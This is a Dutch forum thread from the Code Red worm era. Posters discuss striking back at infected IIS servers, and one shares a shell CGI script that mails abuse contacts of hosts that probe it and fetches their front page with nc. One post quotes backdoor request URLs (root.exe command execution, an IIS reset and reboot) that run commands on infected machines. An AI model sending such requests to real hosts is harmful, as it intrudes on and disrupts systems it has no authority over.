  • _JGC_
  • Registratie: Juli 2000
  • Nu online
Tuurlijk is het niet legaal. Maar als je er een rechtszaak om krijgt?

Kan je altijd nog zeggen: "Ik heb goed gedaan, want ik heb het aantal servers wat strax whitehouse.gov aanvalt flink gereduceerd"

Denk dat een beetje amerikaanse rechter die ook maar enig verstand heeft dan de boel zou afblazen...

Of: Ik had dat script al draaien voordat zij binnenkwamen... Alarm gaat af, server in de boeien :)

Maar legaal is het niet nee. Effectief wel :)

  • Leon
  • Registratie: Maart 2000
  • Laatst online: 19-08 12:12

Leon

Rise Of The Robots

Path staat goed in default.ida :?
denk dat ik dan maar geen script erin zet.. :(

Eeuwige n00b


Verwijderd

Ik heb op een vmware met window 2000 een worm gevangen. Hij reageerd heel geiiriteerd op:

/scripts/c+IIsreset+/reboot

dan gaat de machine op zijn bek:-)

en bij
http://192.168.0.39/scripts/root.exe?/c+net+send+192.168.0.39+yo
u+are+infected+by+code+red+anyone+can+download+your+data+a
sshole!!

krijg je een berichtv op je scherm. Als je %computernaam% gebruikt vult hij die van jou in, wanneer je dit direct doet.

Nu ga ik eens mijzelf aanklagen:-)

hc

  • Leon
  • Registratie: Maart 2000
  • Laatst online: 19-08 12:12

Leon

Rise Of The Robots

dit is ook een heel mooi script.. :)
moet zoals gewoonlijk wel bepaalde perl modules hebben.. :)

Eeuwige n00b


  • Annie
  • Registratie: Juni 1999
  • Laatst online: 25-11-2021

Annie

amateur megalomaan

Tja, het zal allemaal wel meevallen met rechtzaken enzo. Maar wat ik niet begrijp is dat veel mensen met hun hoofd in een roze wolk lopen.
Hoezo,
"maar als ik aangeklaagd wordt dan heb ik verweer blablabla...",
"dan klaag ik hen toch aan...",
"een rechter met verstand van zaken..."?

1. jouw verweer zal vrij weinig uitmaken als je tegenover een groepje duurbetaalde advocaten van een bedrijf staat. Zeker als het een "ja maar, zij zijn begonnen" verweer is.
2. een rechtzaak beginnen? en wie gaat dat betalen? en bij wie denk je dat de geldbuidel het eerste op is?
3. *LOL*

Nogmaals, het zal wel niet zo ver komen, maar sprookjes verzinnen laat je maar aan de gebroeders Grim over ;)

Today's subliminal thought is:


Verwijderd

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/bin/sh

# pad van dir met code-red gegevens, deze moet je ff aanmaken
P=/var/cgi-bin/codered


echo "Content-type: text/plain"
echo
cat $P/mail.txt


if [ -z $REMOTE_ADDR ]; then
  echo "`date`  unknown" >> $P/people/r.txt
  exit
fi


if [ -n "`cat $P/people/r.txt | grep $REMOTE_ADDR`" ]; then
  echo "`date`  $REMOTE_ADDR    host mailed before" >> $P/people/r.txt
  exit
fi


echo "`date`    $REMOTE_ADDR    sending mail" >> $P/people/r.txt


# even opgeven vanaf wie het mailtje komt
EF="wouter@hushmail.com"
# naar wie het mailtje moet
ET="abuse@$REMOTE_ADDR,root@$REMOTE_ADDR,administrator@$REMOTE_ADDR"
# onderwerp
ES="Warning: your computer might be infected with a Code Red virus"

#inhoud van mailtje
EB=`cat $P/mail.txt`

echo -e "From:$EF\nTo:$ET\nSubject:$ES\n$EB\n.\n"|sendmail $ET 2>&1 >> $P/people/maillog.txt



echo -e "\n" >> $P/people/$REMOTE_ADDR.txt
echo "+-----------------------------------------------------------------" >> $P/people/$REMOTE_ADDR.txt
echo "| Possible Code-Red infected computer"  >> $P/people/$REMOTE_ADDR.txt
echo "| hostname  : $REMOTE_ADDR"  >> $P/people/$REMOTE_ADDR.txt
echo "| local date: `date`"  >> $P/people/$REMOTE_ADDR.txt
echo ""  >> $P/people/$REMOTE_ADDR.txt
echo -e "GET / HTTP/1.0\n" | nc $REMOTE_ADDR 80 2>&1 >> $P/people/$REMOTE_ADDR.txt

als het goed is stuurt dit scrip een mailtje naar:
abuse@
root@
administrator@
van de desbetreffende host.

Het vraagt ook / op van de desbetreffende server (om te kijken of hij eigenlijk wel ISS runt, ofdat hij je opzettelijk probeert aan te vallen. Dit kun je weghalen door het stuk vanaf "echo -e "\n" >> $P/people/$REMOTE_ADDR.txt" te verwijderen.

Je moet een directory maken met gegevens, en even P= opgeven. Deze directory moet 755 rwxr-xr-x hebben. In deze directory moet je een bestand mail.txt maken deze moet rw-r--r-- hebben.. Dit is het mailtje dat verstuurt zal worden. Je moet ook een directory "people" maken. Deze moet rwxrwxrwx hebben. Hierin komen de logs.

dus:
directory rwxr-xr-x (opgegeven met P=)
__mail.txt rw-r--r--
__people (directory) rwxrwxrwx

Verder moet je de volgende dingen opgeven:
__EF="wouter@hushmail.com"
__ES="Warning: your computer might be infected with a Code Red virus"

Ik heb het alsvolgt laten uitvoeren door Apache:
ScriptAlias /default.ida "/var/cgi-bin/default.ida"
waarbij "/var/cgi-bin/default.ida" mijn cgi-bin directory is, en het bovenstaande bestandje default.ida in deze cgi-bin directory staat.
Pagina: 1